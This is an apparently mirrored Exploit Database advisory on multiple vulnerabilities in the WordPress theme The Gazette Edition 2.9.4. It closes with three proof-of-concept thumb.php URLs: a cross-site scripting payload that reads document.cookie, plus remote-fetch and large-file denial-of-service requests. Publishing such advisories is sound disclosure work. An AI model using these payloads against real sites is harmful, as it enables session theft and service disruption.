WordPress Theme The Gazette Edition 2.9.4 – Multiple Vulnerabilities

• Exploit Database
• 16 阅读

• 作者： MustLive
  日期： 2011-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35608/

• source: https://www.securityfocus.com/bid/47320/info
  
  The Gazette Edition for WordPress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
  
  Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
  
  Gazette Edition for WordPress 2.9.4 and prior versions are vulnerable. 
  
  http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
  
  http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
  
  http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1